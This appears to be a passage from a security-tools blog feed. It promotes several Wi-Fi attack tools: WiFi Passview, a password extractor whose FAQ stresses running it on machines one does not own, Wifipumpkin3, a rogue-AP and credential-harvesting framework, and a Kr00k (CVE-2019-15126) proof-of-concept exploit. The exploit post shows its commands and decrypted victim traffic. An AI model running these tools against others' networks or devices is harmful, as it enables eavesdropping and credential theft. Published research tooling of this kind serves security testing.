<a href="https://1.bp.blogspot.com/-lo7cv-XWAJw/XwueKkJ80JI/AAAAAAAATFU/aed7-2j0VoEKBR9lnzypq5282tLYiI4ZgCNcBGAsYHQ/s1600/wifi-passview_9_wifi-passview-v4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="979" height="334" src="https://1.bp.blogspot.com/-lo7cv-XWAJw/XwueKkJ80JI/AAAAAAAATFU/aed7-2j0VoEKBR9lnzypq5282tLYiI4ZgCNcBGAsYHQ/s640/wifi-passview_9_wifi-passview-v4.gif" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>In Action</b></span><br />
Here's how this tool works...<br />
<br />
<div style="text-align: center;">
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/dYWuXBjMyVc" width="560"></iframe></div>
<br />
<div style="text-align: center;">
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/eu1DUgwP2wM" width="560"></iframe></div>
<br />
Don't forget to like, share, and subscribe to my channel!<br />
<br />
<span style="font-size: large;"><b>White Label / Personalize / Custom / Development</b></span><br />
<ul>
<li>Download the repository</li>
<li>Do <strong><code>"npm install"</code></strong> and <strong><code>"npm install gulp-cli -g && npm install gulp -D"</code></strong></li>
<li>After that, edit the <strong><code>"./src/config.json"</code></strong> file for your customization or personalization.</li>
<li>When you think you are satisfy, just do <strong><code>"gulp build"</code></strong> or <strong><code>"gulp"</code></strong> to initiate the building process.</li>
<li>If you want to reset the building process just do <strong><code>"gulp cleandev"</code></strong>.</li>
<li>If you are editing the <strong><code>"./src/core.bat"</code></strong> you can use <strong><code>"gulp test"</code></strong> it is a combination of <strong><code>"gulp build"</code></strong> and <strong><code>"gulp cleandev"</code></strong> so you can quickly quality check the production build.</li>
<li>Do <strong><code>"gulp --tasks"</code></strong> to see all available <strong><code>"gulp"</code></strong> commands.</li>
</ul>
<br />
<span style="font-size: large;"><b>Premium Version</b></span><br />
Looking for the official <strong><code>"wifi-passview-vX.X.X.exe"</code></strong> version and wanna support the project?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9Zz_cMJ4mP0/XwueQXwaaxI/AAAAAAAATFY/zCN7bQ67YvUrWL69FhnUZg0z4qay5k03gCNcBGAsYHQ/s1600/wifi-passview_12_premium.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="954" height="339" src="https://1.bp.blogspot.com/-9Zz_cMJ4mP0/XwueQXwaaxI/AAAAAAAATFY/zCN7bQ67YvUrWL69FhnUZg0z4qay5k03gCNcBGAsYHQ/s640/wifi-passview_12_premium.jpeg" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>FAQs</b></span><br />
<strong>Q</strong>: Why you don't use the built-in <code>netsh wlan</code> export command?<br />
<blockquote>
<em>I'm aware of that command, the only reason why I use <code>findstr</code> instead of that command is that to make the tool more user-level that does not require any admin rights. For example, if you are about to use the tool in a machine that you don't own then you're not able to use the tool. Got the idea? If the tool does not require admin rights then we can avoid the UAC prompt and we can use the tool more efficiently, the command <code>netsh wlan show profiles</code> do not require admin rights that's why we can still use that and <a href="https://www.kitploit.com/search/label/Capture" target="_blank" title="capture">capture</a> the data and save it to file using the <code>findstr</code> command. Brilliant?</em></blockquote>
Visit <a href="https://github.com/warengonzaga/wifi-passview/wiki/Frequently-Asked-Questions" rel="nofollow" target="_blank" title="FAQ section">FAQ section</a> for more information.<br />
<br />
<span style="font-size: large;"><b>Contributing</b></span><br />
Contributions are welcome, create a pull request to <strong>dev</strong> branch of this repo and I will review your code.<br />
<br />
<span style="font-size: large;"><b>Issues</b></span><br />
If you're facing a problem in using WiFi Passview please let me know by creating an issue in this github repository. I'm happy to help you! Don't forget to provide some <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="screenshot">screenshot</a> or error logs of it!<br />
<br />
<span style="font-size: large;"><b>To Do</b></span><br />
<ul>
<li>Extract WiFi Password Across Network (experimental)</li>
<li>More... (have suggestions? let me know!)</li>
</ul>
<br />
<span style="font-size: large;"><b>Supporters and Backers</b></span><br />
<ul>
<li>ernest_bigelow, nanantakeshi, kerry_howell</li>
</ul>
Wanna see your name here? <a href="https://www.buymeacoffee.com/warengonzaga" rel="nofollow" target="_blank" title="Just buy me a coffee">Just buy me a coffee</a>!<br />
<br />
<span style="font-size: large;"><b>License</b></span><br />
WiFi Passview is licensed under GNU General Public License v3 - <a href="https://opensource.org/licenses/GPL-3.0" rel="nofollow" target="_blank" title="https://opensource.org/licenses/GPL-3.0">https://opensource.org/licenses/GPL-3.0</a><br />
<br />
<span style="font-size: large;"><b>Author</b></span><br />
This project is created by <strong>Waren Gonzaga</strong> for educational purposes.<br />
<ul>
<li><strong>Facebook:</strong> <a href="https://facebook.com/warengonzagaofficial" rel="nofollow" target="_blank" title="https://facebook.com/warengonzagaofficial">https://facebook.com/warengonzagaofficial</a></li>
<li><strong>Twitter:</strong> <a href="https://twitter.com/warengonzaga" rel="nofollow" target="_blank" title="https://twitter.com/warengonzaga">https://twitter.com/warengonzaga</a></li>
<li><strong>Website:</strong> <a href="https://warengonzaga.com/" rel="nofollow" target="_blank" title="https://warengonzaga.com">https://warengonzaga.com</a></li>
<li><strong>Email:</strong> dev(at)warengonzaga[.]com</li>
</ul>
<strong><br /></strong>
<strong></></strong> with <strong><3</strong> by <strong>Waren Gonzaga</strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/warengonzaga/wifi-passview" rel="nofollow" target="_blank" title="Download Wifi-Passview">Download Wifi-Passview</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-78809863234220915162020-05-11T17:30:00.000-04:002020-05-11T17:30:12.191-04:00Wifipumpkin3 - Powerful Framework For Rogue Access Point Attack<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-DywqNOossUI/XqZSlwn3hQI/AAAAAAAASec/-3Eoz17HFYkRG5tMtwPH86CBVc_V56x-gCNcBGAsYHQ/s1600/wifipumpkin3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" height="360" src="https://1.bp.blogspot.com/-DywqNOossUI/XqZSlwn3hQI/AAAAAAAASec/-3Eoz17HFYkRG5tMtwPH86CBVc_V56x-gCNcBGAsYHQ/s640/wifipumpkin3.jpeg" width="640" /></a></div>
<br />
<strong>wifipumpkin3</strong> is powerful framework for rogue access point attack, written in Python, that allow and offer to security researchers, red teamers and <a href="https://www.kitploit.com/search/label/Reverse" target="_blank" title="reverse">reverse</a> engineers to mount a <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> network to conduct a <a href="https://www.kitploit.com/search/label/Man-in-the-Middle" target="_blank" title="man-in-the-middle">man-in-the-middle</a> attack.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Main Features</b></span><br />
<ul>
<li>Rogue access point attack</li>
<li>Man-in-the-middle attack</li>
<li>Rogue <strong>Dns Server</strong></li>
<li>Captive portal attack (captiveflask)</li>
<li><strong>Intercept</strong>, inspect, modify and replay <strong>web traffic</strong></li>
<li><strong>WiFi</strong> networks scanning</li>
<li><strong>DNS</strong> monitoring service</li>
<li>Credentials harvesting</li>
<li>Transparent Proxies</li>
<li>LLMNR, NBT-NS and MDNS <a href="https://www.kitploit.com/search/label/Poisoner" target="_blank" title="poisoner">poisoner</a> (<a href="https://github.com/skelsec/Responder3" rel="nofollow" target="_blank" title="Responder3">Responder3</a>)</li>
<li>and <strong>more</strong>!</li>
</ul>
<br />
<span style="font-size: large;"><b>Supported platforms</b></span><br />
<ul>
<li><strong>Python</strong>: you need <strong>Python 3.7 or later</strong> to run Wp3.</li>
</ul>
<table> <thead>
<tr> <th>NOTE: The Wp3 require hostapd installed by default</th> </tr>
</thead> </table>
<ul>
<li><strong>Operating System</strong>: <ul>
<li>a recent version of Linux (we tested on <strong>Ubuntu 18.04 LTS</strong>);</li>
<li>please note: <strong>Windows</strong> is not <strong>supported</strong>.</li>
</ul>
</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation & Documentation</b></span><br />
Learn more about using <a href="https://wifipumpkin3.github.io/" rel="nofollow" target="_blank" title="wp3 on the official site!">wp3 on the official site!</a><br />
<ul>
<li><a href="https://wifipumpkin3.github.io/docs/getting-started" rel="nofollow" target="_blank" title="Getting Started">Getting Started</a></li>
<li><a href="https://wifipumpkin3.github.io/docs/getting-started#installation" rel="nofollow" target="_blank" title="Installation">Installation</a></li>
</ul>
<br />
<span style="font-size: large;"><b>community</b></span><br />
on discord: <a href="https://discord.gg/jywYskR" rel="nofollow" target="_blank" title="https://discord.gg/jywYskR">https://discord.gg/jywYskR</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/P0cL4bs/wifipumpkin3" rel="nofollow" target="_blank" title="Download Wifipumpkin3">Download Wifipumpkin3</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-3952170298641874862020-03-30T17:30:00.000-03:002020-03-30T17:30:01.181-03:00R00Kie-Kr00Kie - PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iVX1skjBQ28/Xn_3dtthSJI/AAAAAAAASHQ/dz3m7vebGd02JRx91Il0HoDb6zWQTe6lACNcBGAsYHQ/s1600/r00kie-kr00kie_1_rookie.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="547" data-original-width="864" height="404" src="https://1.bp.blogspot.com/-iVX1skjBQ28/Xn_3dtthSJI/AAAAAAAASHQ/dz3m7vebGd02JRx91Il0HoDb6zWQTe6lACNcBGAsYHQ/s640/r00kie-kr00kie_1_rookie.jpeg" width="640" /></a></div>
<div align="center">
<br /></div>
<span style="font-size: large;"><b>Disclaimer</b></span><br />
This is a PoC exploit for the CVE-2019-15126 <strong>kr00k</strong> vulnerability.<br />
<em><strong>This project is intended for educational purposes only and cannot be used for law violation or personal gain.<br />The author of this project is not responsible for any possible harm caused by the materials.</strong></em><br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
To use these scripts, you will need a WiFi card supporting the active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n) we used to develop and test the code. We have tested this PoC on <strong>Kali Linux</strong><br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code># clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt</code></pre>
<br />
<span style="font-size: large;"><b>How to use</b></span><br />
<br />
<b>Script: <a href="https://github.com/hexway/r00kie-kr00kie/blob/master/r00kie-kr00kie.py" rel="nofollow" target="_blank" title="r00kie-kr00kie.py">r00kie-kr00kie.py</a></b><br />
This is the main exploit file that implements the <strong>kr00k</strong> attack<br />
<div>
<pre><code>->~:python3 r00kie-kr00kie.py -h
usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]
PoC of CVE-2019-15126 kr00k vulnerability
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, --channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, --bssid BSSID
Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
-c CLIENT, --client CLIENT
Set WiFi client MAC address (example:
"01:23:45:67:89:0b")
-n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
Set numb er of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, --quiet Minimal output</code></pre>
</div>
In order to start an attack, you need to know <em>bssid</em> of access points, its <em>channel</em> and <em>mac address</em> of the victim. You can find them using the <code>airodump-ng wlan0</code> utility.<br />
Run the exploit:<br />
<div>
<pre><code>->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $ $| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0xa649
###[ DNS ]###
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0x104b
###[ DNS ]###
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None</code></pre>
</div>
Also, if you have already intercepted traffic (pcap file) after the <code>kr00t</code> attack, you can decrypt:<br />
<div>
<pre><code>->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
load = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r \n\r\n'
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follo w all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
###[ TCP ]###
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]
[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap</code></pre>
</div>
<br />
<b>Script: <a href="https://github.com/hexway/r00kie-kr00kie/blob/master/traffic_generator.py" rel="nofollow" target="_blank" title="traffic_generator.py">traffic_generator.py</a></b><br />
This script generates <code>UDP</code> traffic from the victim, to demonstrate the <code>kr00k</code> attack<br />
<div>
<pre><code>->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit</code></pre>
</div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/hexway/r00kie-kr00kie" rel="nofollow" target="_blank" title="Download R00Kie-Kr00Kie">Download R00Kie-Kr00Kie</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77515885809359804512020-03-03T09:30:00.000-03:002020-03-03T09:30:00.983-03:00WiFi Passview v2.0 - An Open Source Batch Script Based WiFi Passview For Windows!<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-lb6LhYM3luQ/Xl2pB2HZs1I/AAAAAAAAR1Y/FAJMiTtoomI8TrZTnCoCfUonSHsUgyCmQCNcBGAsYHQ/s1600/wifi-passview_8_screenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="843" height="402" src="https://1.bp.blogspot.com/-lb6LhYM3luQ/Xl2pB2HZs1I/AAAAAAAAR1Y/FAJMiTtoomI8TrZTnCoCfUonSHsUgyCmQCNcBGAsYHQ/s640/wifi-passview_8_screenshot.jpeg" width="640" /></a></div>
<strong><br /></strong>
<strong>WiFi Passview</strong> is an open source batch script based program that can recover your WiFi Password easily in seconds. This is for <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> OS only. Basically, this scripted program has the same function as other passview softwares such as webpassview and mailpassview.<br />
<em><strong>Disclaimer</strong>: WiFi Passview is <strong>NOT</strong> designed for malicious use! Please use this program responsibly!</em><br />
<a name='more'></a><br />
<span style="font-size: large;"><b>ZSecurity.org</b></span><br />
This project is posted on a cyber security educational <a href="https://www.kitploit.com/search/label/Website" target="_blank" title="website">website</a> called zsecurity.org you should visit this project here for more information: <a href="https://zsecurity.org/" rel="nofollow" target="_blank" title="https://zsecurity.org">https://zsecurity.org</a><br />
<br />
<span style="font-size: large;"><b>How it Works</b></span><br />
Basically, this is the shortcut and batch scripted file version of a popular WiFi password manager viewing method using command prompt. This is how it works...<br />
<div>
<pre><code>netsh <a href="https://www.kitploit.com/search/label/WLAN" target="_blank" title="wlan">wlan</a> show profiles</code></pre>
</div>
When you use this tool, you are able to extract the WiFi <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> stored on the target machine in just a seconds.<br />
<br />
<span style="font-size: large;"><b>Features</b></span><br />
This simple tool offers you the following features...<br />
<ul>
<li>Extract all available WiFi passwords stored in the target machine and can be done in just a seconds.</li>
<li>Extract password from specific target SSID.</li>
<li>Save extracted passwords.</li>
<li>Additional options.</li>
<li>No manual reading of <strong><code>Key Content</code></strong>, the tool will do that for you!</li>
<li>Standalone batch program.</li>
<li>Customizable.</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
Download the repository and look for <strong><code>"wifi-passview-vX.X.X.bat"</code></strong> file and open it and run as administrator. All you have to do is to follow the on-screen instructions.<br />
Wanna use for WiFi Hacking? Visit this <strong>blog</strong>...<br />
<br />
<span style="font-size: large;"><b>In Action</b></span><br />
Here's how this tool works...<br />
<br />
<div style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/dYWuXBjMyVc" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>
<br />
Don't forget to like, share, and subscribe to my channel!<br />
<br />
<span style="font-size: large;"><b>White Label / Personalize / Custom</b></span><br />
<ul>
<li>Download the repository</li>
<li>Do <strong><code>"npm install"</code></strong> and <strong><code>"npm install gulp-cli -g && npm install gulp -D"</code></strong></li>
<li>After that, edit the <strong><code>"./src/config.json"</code></strong> file for your customization or personalization.</li>
<li>When you think you are satisfy, just do <strong><code>"gulp build"</code></strong> or <strong><code>"gulp"</code></strong> to initiate the building process.</li>
<li>If you want to reset the building process just do <strong><code>"gulp cleandev"</code></strong>.</li>
</ul>
<br />
<span style="font-size: large;"><b>Contributing</b></span><br />
Contributions are welcome, create a pull request to this repo and I will review your code.<br />
<br />
<span style="font-size: large;"><b>Issues</b></span><br />
If you're facing a problem in using WiFi Passview please let me know by creating an issue in this github repository. I'm happy to help you! Don't forget to provide some <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="screenshot">screenshot</a> or error logs of it!<br />
<br />
<span style="font-size: large;"><b>To Do</b></span><br />
<ul>
<li>Gulp Options</li>
<li>CI (Travis)</li>
<li>More... (have suggestions? let me know!)</li>
</ul>
<br />
<span style="font-size: large;"><b>Author</b></span><br />
This project is created by <strong>Waren Gonzaga</strong> for educational purposes.<br />
<ul>
<li><strong>Facebook:</strong> <a href="https://facebook.com/warengonzagaofficialpage" rel="nofollow" target="_blank" title="https://facebook.com/warengonzagaofficialpage">https://facebook.com/warengonzagaofficialpage</a></li>
<li><strong>Twitter:</strong> <a href="https://twitter.com/warengonzaga" rel="nofollow" target="_blank" title="https://twitter.com/warengonzaga">https://twitter.com/warengonzaga</a></li>
<li><strong>Website:</strong> <a href="https://warengonzaga.com/" rel="nofollow" target="_blank" title="https://warengonzaga.com">https://warengonzaga.com</a></li>
<li><strong>Email:</strong> dev(at)warengonzaga[.]com</li>
</ul>
<div>
<br /></div>
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/WarenGonzaga/wifi-passview" rel="nofollow" target="_blank" title="Download Wifi-Passview">Download Wifi-Passview</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-26812803933849136102020-02-26T09:00:00.000-03:002020-02-26T09:00:07.082-03:00Wifi-Hacker - Shell Script For Attacking Wireless Connections Using Built-In Kali ToolsShell Script For Attacking <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> Connections Using Built-In <a href="https://www.kitploit.com/search/label/Kali" target="_blank" title="Kali">Kali</a> Tools. Supports All Securities (WEP, WPS, WPA, WPA2)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BtLWlh-Rcjc/XlRjzXhrMkI/AAAAAAAARvw/0r9GQsQvb4IHkxHvZzI6zOjm9qsesNHFwCNcBGAsYHQ/s1600/wifi-hacker_1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-BtLWlh-Rcjc/XlRjzXhrMkI/AAAAAAAARvw/0r9GQsQvb4IHkxHvZzI6zOjm9qsesNHFwCNcBGAsYHQ/s640/wifi-hacker_1.jpeg" width="640" /></a></div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: center;">
